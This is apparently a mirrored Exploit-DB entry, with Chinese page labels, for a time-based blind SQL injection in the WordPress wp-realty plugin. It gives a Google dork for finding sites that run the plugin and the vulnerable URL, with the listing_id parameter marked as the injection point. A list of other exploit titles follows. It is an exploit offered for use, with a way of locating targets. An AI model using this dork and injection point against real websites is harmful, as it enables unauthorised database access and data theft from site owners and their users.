WordPress Plugin Realty – Blind SQL Injection

Exploit Database
10 阅读

作者： Napsterakos

日期： 2013-10-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/29021/

 $$$$$$\$$\ $$\ $$$$$$\
$$__$$\ $$ |$$ | $$__$$\ 
$$ /\__|$$ |$$ | $$ /\__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ |$$__$$ |\____$$\ 
$$ |$$ |$$ |$$ | $$\ $$ |
\$$$$$$|$$\ $$ |$$ |$$\\$$$$$$|
 \______/ \__|\__|\__|\__|\______/ 
 
# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos


Link: http://localhost/wordpress/wp-content/plugins/wp-realty/

Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]


Credits to: Greek Hacking Scene

last Exploits
WordPress Plugin Realty – Blind SQL Injection的更多信息

C2 WebResource – ‘File’ Cross-Site Scripting：
WordPress Plugin S3Bubble Cloud Video With Adverts & Analytics 0.7 – Arbitrary File Download：
D-Link DSR-250N 3.12 – Denial of Service (PoC)：
e107 1.0 – ‘view’ SQL Injection：
CrushFTP 7.2.0 – Multiple Vulnerabilities：
WordPress Plugin Symposium 14.10 – SQL Injection：
Maian Weblog 4.0 – SQL Injection：
Joomla! Component vAccount 2.0.2 – ‘vid’ SQL Injection：